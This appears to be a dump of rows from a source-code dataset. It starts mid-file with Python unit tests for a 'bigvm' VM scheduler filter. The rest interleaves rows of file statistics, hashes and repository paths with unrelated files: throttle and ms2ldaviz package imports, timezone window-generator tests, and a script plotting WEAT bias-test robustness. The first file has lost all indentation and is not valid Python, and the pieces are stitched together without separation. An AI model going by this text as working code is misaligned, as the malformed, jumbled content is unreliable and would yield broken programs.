super(TestBigVmBaseFilter, self).setUp()
self.filt_cls = bigvm_filter.BigVmBaseFilter()
self.hv_size = CONF.bigvm_mb + 1024
def test_big_vm_host_without_inventory(self, mock_inv):
mock_inv.return_value = {}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': self.hv_size,
'total_usable_ram_mb': self.hv_size,
'uuid': uuidsentinel.host1})
self.assertIsNone(self.filt_cls._get_hv_size(host))
def test_big_vm_host_with_placement_error(self, mock_inv):
mock_inv.return_value = None
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': self.hv_size,
'total_usable_ram_mb': self.hv_size,
'uuid': uuidsentinel.host1})
self.assertIsNone(self.filt_cls._get_hv_size(host))
def test_big_vm_host_with_empty_inventory(self, mock_inv):
mock_inv.return_value = {'inventories': {}}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': self.hv_size,
'total_usable_ram_mb': self.hv_size,
'uuid': uuidsentinel.host1})
self.assertIsNone(self.filt_cls._get_hv_size(host))
def test_big_vm_get_hv_size_with_cache(self, mock_inv):
mock_inv.return_value = {}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': self.hv_size,
'total_usable_ram_mb': self.hv_size,
'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE = {
host.uuid: 1234,
'last_modified': time.time()
}
self.assertEqual(self.filt_cls._get_hv_size(host), 1234)
def test_big_vm_get_hv_size_cache_timeout(self, mock_inv):
mock_inv.return_value = {'inventories': {'MEMORY_MB':
{'max_unit': 23}}}
host = fakes.FakeHostState('host1', 'compute',
{'free_ram_mb': self.hv_size,
'total_usable_ram_mb': self.hv_size,
'uuid': uuidsentinel.host1})
mod = time.time() - self.filt_cls._HV_SIZE_CACHE_RETENTION_TIME
self.filt_cls._HV_SIZE_CACHE = {
host.uuid: 1234,
'last_modified': mod
}
self.assertEqual(self.filt_cls._get_hv_size(host), 23)
class TestBigVmClusterUtilizationFilter(test.NoDBTestCase):
def setUp(self):
super(TestBigVmClusterUtilizationFilter, self).setUp()
self.hv_size = CONF.bigvm_mb + 1024
self.filt_cls = bigvm_filter.BigVmClusterUtilizationFilter()
self.filt_cls._HV_SIZE_CACHE = {
uuidsentinel.host1: self.hv_size,
'last_modified': time.time()
}
def test_big_vm_with_small_vm_passes(self):
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=1024, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_baremetal_instance_passes(self):
extra_specs = {'capabilities:cpu_arch': 'x86_64'}
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs=extra_specs))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_hv_size(self):
"""If there's no inventory for this host, it should not even have
passed placement API checks, so we stop it here.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = None
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_enough_ram(self):
# there's enough RAM available in the cluster but not enough (~50 % of
# the requested size on average
# 12 hosts (bigvm + 1 GB size)
# 11 big VM + some smaller (12 * 1 GB) already deployed
# -> still bigvm_mb left, but ram utilization ratio of all hosts is too
# high
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': CONF.bigvm_mb,
'total_usable_ram_mb': total_ram})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_enough_ram_ignores_ram_ratio(self):
# same as test_big_vm_without_enough_ram but with more theoretical RAM
# via `ram_allocation_ratio`. big VMs reserve all memory so the ratio
# does not count for them.
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': CONF.bigvm_mb,
'total_usable_ram_mb': total_ram,
'ram_allocation_ratio': 1.5})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_enough_ram_percent(self):
# there's just closely not enough RAM available
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
hv_percent = self.filt_cls._get_max_ram_percent(CONF.bigvm_mb,
self.hv_size)
free_ram_mb = total_ram - (total_ram * hv_percent / 100.0) - 128
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': free_ram_mb,
'total_usable_ram_mb': total_ram})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_with_enough_ram(self):
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
total_ram = self.hv_size * 12
hv_percent = self.filt_cls._get_max_ram_percent(CONF.bigvm_mb,
self.hv_size)
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1,
'free_ram_mb': total_ram - (total_ram * hv_percent / 100.0),
'total_usable_ram_mb': total_ram})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
class TestBigVmFlavorHostSizeFilter(test.NoDBTestCase):
def setUp(self):
super(TestBigVmFlavorHostSizeFilter, self).setUp()
self.hv_size = CONF.bigvm_mb + 1024
self.filt_cls = bigvm_filter.BigVmFlavorHostSizeFilter()
self.filt_cls._HV_SIZE_CACHE = {
uuidsentinel.host1: self.hv_size,
'last_modified': time.time()
}
def test_big_vm_with_small_vm_passes(self):
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=1024, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_baremetal_instance_passes(self):
extra_specs = {'capabilities:cpu_arch': 'x86_64'}
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs=extra_specs))
host = fakes.FakeHostState('host1', 'compute', {})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_hv_size(self):
"""If there's no inventory for this host, it should not even have
passed placement API checks, so we stop it here.
"""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = None
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_memory_match_with_tolerance(self):
"""We only accept tolerance below not above the given value."""
def call(a, b):
return self.filt_cls._memory_match_with_tolerance(a, b)
self.filt_cls._HV_SIZE_TOLERANCE_PERCENT = 10
self.assertTrue(call(1024, 1024 - 1024 * 0.1))
self.assertFalse(call(1024, 1024 - 1024 * 0.1 - 1))
self.assertTrue(call(1024, 1024))
self.assertFalse(call(1024, 1025))
self.filt_cls._HV_SIZE_TOLERANCE_PERCENT = 50
self.assertTrue(call(1024, 512))
self.assertFalse(call(1024, 511))
def test_big_vm_with_matching_full_size(self):
"""Test automatic full size matching."""
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_with_matching_half_size(self):
"""Test automatic full size matching."""
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_with_half_size_not_defined(self):
"""Test automatic full size matching."""
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_big_vm_without_matching_size(self):
"""Fails both half and full size test"""
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={}))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 1.5 + 1024
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_without_key(self):
"""If we don't have the extra spec set, we fail"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb, extra_specs={},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_invalid_value(self):
"""invalid value in extra specs makes it unscheduleable"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'any'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_full_positive(self):
"""test specified full size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'full'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_full_negative(self):
"""test specified full size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'full'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_half_positive(self):
"""test specified half size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'full,half'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_half_positive_with_unknown(self):
"""test specified half size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'broken,half'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.filt_cls._HV_SIZE_CACHE[host.uuid] = CONF.bigvm_mb * 2 + 1024
self.assertTrue(self.filt_cls.host_passes(host, spec_obj))
def test_extra_specs_half_negative(self):
"""test specified half size"""
CONF.set_override('bigvm_host_size_filter_uses_flavor_extra_specs',
True, 'filter_scheduler')
CONF.set_override('bigvm_host_size_filter_host_fractions',
{'full': 1, 'half': 0.5}, 'filter_scheduler')
spec_obj = objects.RequestSpec(
flavor=objects.Flavor(memory_mb=CONF.bigvm_mb,
extra_specs={'host_fraction': 'half'},
name='random-name'))
host = fakes.FakeHostState('host1', 'compute',
{'uuid': uuidsentinel.host1})
self.assertFalse(self.filt_cls.host_passes(host, spec_obj))
| 47.33871 | 79 | 0.62402 | 2,134 | 17,610 | 4.838332 | 0.116682 | 0.036416 | 0.050073 | 0.06799 | 0.81201 | 0.804455 | 0.78586 | 0.762131 | 0.752639 | 0.745085 | 0 | 0.019545 | 0.267859 | 17,610 | 371 | 80 | 47.466307 | 0.781277 | 0.097729 | 0 | 0.738676 | 0 | 0 | 0.131273 | 0.048347 | 0 | 0 | 0 | 0 | 0.111498 | 1 | 0.108014 | false | 0.087108 | 0.027875 | 0.003484 | 0.149826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
fae68e94d8b6773b1e07da4536599c45f6bcd5c4 | 230 | py | Python | throttle/tests/__init__.py | sobotklp/django-throttle-requests | b54fced5bbff2b95495bb3b8e9ccc064ed9afd98 | [
"MIT"
] | 46 | 2015-01-22T23:05:46.000Z | 2022-03-22T07:25:59.000Z | throttle/tests/__init__.py | alimp5/django-throttle-requests | 9072b2570f1ce3c2e12f7590fc2596045ab528d7 | [
"MIT"
] | 14 | 2015-04-27T05:41:04.000Z | 2021-05-24T19:37:00.000Z | throttle/tests/__init__.py | alimp5/django-throttle-requests | 9072b2570f1ce3c2e12f7590fc2596045ab528d7 | [
"MIT"
] | 13 | 2015-01-18T16:44:41.000Z | 2021-05-16T10:44:20.000Z | from throttle.tests.test_utils import test_load_module_from_path
from throttle.tests.test_zones import TestRemoteIP, Test_ThrottleZone
from throttle.tests.test_decorators import test_throttle
from throttle.tests.backends import *
| 46 | 69 | 0.882609 | 33 | 230 | 5.878788 | 0.424242 | 0.247423 | 0.350515 | 0.324742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073913 | 230 | 4 | 70 | 57.5 | 0.910798 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4f0d9d2aff3065dd502eceb20f081d206d262d8e | 116 | py | Python | ms2ldaviz/basicviz/views/__init__.py | RP0001/ms2ldaviz | 35ae516f5d3ec9d1a348e8308a4ea50f3ebcdfd7 | [
"MIT"
] | null | null | null | ms2ldaviz/basicviz/views/__init__.py | RP0001/ms2ldaviz | 35ae516f5d3ec9d1a348e8308a4ea50f3ebcdfd7 | [
"MIT"
] | null | null | null | ms2ldaviz/basicviz/views/__init__.py | RP0001/ms2ldaviz | 35ae516f5d3ec9d1a348e8308a4ea50f3ebcdfd7 | [
"MIT"
] | null | null | null | from views_index import *
from views_lda_single import *
from views_lda_multi import *
from views_lda_admin import * | 29 | 30 | 0.836207 | 19 | 116 | 4.736842 | 0.421053 | 0.4 | 0.5 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12931 | 116 | 4 | 31 | 29 | 0.891089 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
87e9db316353c863e5bbd60165f723e5fcd2d814 | 3,409 | py | Python | test/test_time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | null | null | null | test/test_time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | null | null | null | test/test_time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | 2 | 2020-08-12T20:38:39.000Z | 2021-04-10T19:30:16.000Z | #!/usr/bin/env python
import unittest
from datetime import datetime, time
import pytz
from time_window_generator import TimeWindowGenerator
__author__ = "Aditya Pahuja"
__copyright__ = "Copyright (c) 2020"
__maintainer__ = "Aditya Pahuja"
__email__ = "aditya.s.pahuja@gmail.com"
__status__ = "Production"
class TestTimeWindowGenerator(unittest.TestCase):
LONDON_TIMEZONE = pytz.timezone('Europe/London')
def setUp(self):
start_time = time(8, 0, 0, 0, TestTimeWindowGenerator.LONDON_TIMEZONE)
stop_time = time(16, 30, 0, 0, TestTimeWindowGenerator.LONDON_TIMEZONE)
self.time_checker = TimeWindowGenerator({'MONDAY', 'TUESDAY'}, start_time, stop_time, TestTimeWindowGenerator.LONDON_TIMEZONE)
def test_get_today_window_when_current_date_is_before_start_time(self):
date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 7, 59, 59, 999999), is_dst=True)
window = self.time_checker.get_window_of_time(date)
self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 8, 0, 0, 0), is_dst=True))
self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 30, 0, 0), is_dst=True))
def test_get_today_window_when_current_date_is_before_end_time(self):
date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 30, 0, 0), is_dst=True)
window = self.time_checker.get_window_of_time(date)
self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 8, 0, 0, 0), is_dst=True))
self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 30, 0, 0), is_dst=True))
def test_get_tomorrow_window_when_current_date_is_after_end_time(self):
date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 6, 16, 31, 0, 0), is_dst=True)
window = self.time_checker.get_window_of_time(date)
self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 7, 8, 0, 0, 0), is_dst=True))
self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 7, 16, 30, 0, 0), is_dst=True))
def test_get_next_window_when_current_date_is_after_end_time_and_is_on_tuesday(self):
date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 7, 16, 31, 0, 0), is_dst=True)
window = self.time_checker.get_window_of_time(date)
self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 8, 0, 0, 0), is_dst=True))
self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 16, 30, 0, 0), is_dst=True))
def test_get_next_window_when_current_date_is_not_on_days(self):
date = TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 8, 17, 31, 0, 0), is_dst=True)
window = self.time_checker.get_window_of_time(date)
self.assertEqual(window.start_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 8, 0, 0, 0), is_dst=True))
self.assertEqual(window.stop_date, TestTimeWindowGenerator.LONDON_TIMEZONE.localize(datetime(2020, 1, 13, 16, 30, 0, 0), is_dst=True))
| 63.12963 | 142 | 0.757114 | 477 | 3,409 | 5.106918 | 0.15304 | 0.018062 | 0.273399 | 0.252463 | 0.795567 | 0.763547 | 0.763547 | 0.763547 | 0.747126 | 0.71798 | 0 | 0.065247 | 0.132297 | 3,409 | 53 | 143 | 64.320755 | 0.758283 | 0.005867 | 0 | 0.325 | 0 | 0 | 0.030992 | 0.007379 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.15 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e20c550b4dc39edb4fcbf0c351376a1eb9dd2e83 | 6,500 | py | Python | paper/plotRobustnessTests.py | SebastianGer/biases-in-word-embeddings | 001499003caf213acf62dffbe29a54259a60e3e4 | [
"MIT"
] | null | null | null | paper/plotRobustnessTests.py | SebastianGer/biases-in-word-embeddings | 001499003caf213acf62dffbe29a54259a60e3e4 | [
"MIT"
] | null | null | null | paper/plotRobustnessTests.py | SebastianGer/biases-in-word-embeddings | 001499003caf213acf62dffbe29a54259a60e3e4 | [
"MIT"
] | null | null | null | # Plots the results of the experiments investigating the robustness of the WEAT to permutation and subsampling
import pandas as pd
import matplotlib
matplotlib.use('pgf')
import matplotlib.pyplot as plt
df = pd.read_csv("data/robustnessToPermutation.csv")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of bias tests under permutation")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToPermutationP.pgf")
fig.savefig("plots/robustnessToPermutationP.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToPermutation.csv")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2))
plt.ylabel("Effect size")
plt.legend()#loc = "lower right")
plt.title("Robustness of bias tests under permutation")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToPermutationD.pgf")
fig.savefig("plots/robustnessToPermutationD.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.01]
# Replace NA string with NaN value
df = df.apply(lambda s: map(lambda x : float('NaN') if x=="'NA'" else x, s), axis = 1)
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.01")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.01P.pgf")
fig.savefig("plots/robustnessToSubsampling0.01P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.01")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.01D.pgf")
fig.savefig("plots/robustnessToSubsampling0.01D.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.05]
# Replace NA string with NaN value
df = df.apply(lambda s: map(lambda x : float('NaN') if x=="'NA'" else x, s), axis = 1)
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.05")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.05P.pgf")
fig.savefig("plots/robustnessToSubsampling0.05P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2.0))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.05")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.05D.pgf")
fig.savefig("plots/robustnessToSubsampling0.05D.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.1]
# Replace NA string with NaN value
df = df.apply(lambda s: map(lambda x : float('NaN') if x=="'NA'" else x, s), axis = 1)
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.1")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.1P.pgf")
fig.savefig("plots/robustnessToSubsampling0.1P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2.0))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.1")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.1D.pgf")
fig.savefig("plots/robustnessToSubsampling0.1D.pdf")
plt.clf()
df = pd.read_csv("data/robustnessToSubsampling.csv")
df = df[df['Sampling Rate'] == 0.5]
# Replace NA string with NaN value
df = df.apply(lambda s: map(lambda x : float('NaN') if x=="'NA'" else x, s), axis = 1)
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'p')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-0.1,1.1))
plt.ylabel("p")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.5")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.5P.pgf")
fig.savefig("plots/robustnessToSubsampling0.5P.pdf")
plotDf = df.pivot(index = "Iteration", columns = 'Test', values = 'Effect size')
fig = plt.figure()
plotDf.boxplot(rot=45)
plt.tight_layout() # makes sure that long x labels are not cut off
plt.gcf().subplots_adjust(left=0.15)
plt.ylim((-2,2.0))
plt.ylabel("Effect size")
plt.legend()
plt.title("Robustness of biast tests under subsampling: sampling rate 0.5")
plt.tick_params(axis='both', which='both', top='off', right='off')
fig.savefig("plots/robustnessToSubsampling0.5D.pgf")
fig.savefig("plots/robustnessToSubsampling0.5D.pdf")
| 29.953917 | 110 | 0.72 | 1,020 | 6,500 | 4.552941 | 0.108824 | 0.043066 | 0.064599 | 0.134367 | 0.930663 | 0.849699 | 0.849699 | 0.849699 | 0.847761 | 0.847761 | 0 | 0.027078 | 0.108 | 6,500 | 216 | 111 | 30.092593 | 0.773888 | 0.110769 | 0 | 0.804196 | 0 | 0 | 0.344498 | 0.161055 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.020979 | 0 | 0.020979 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
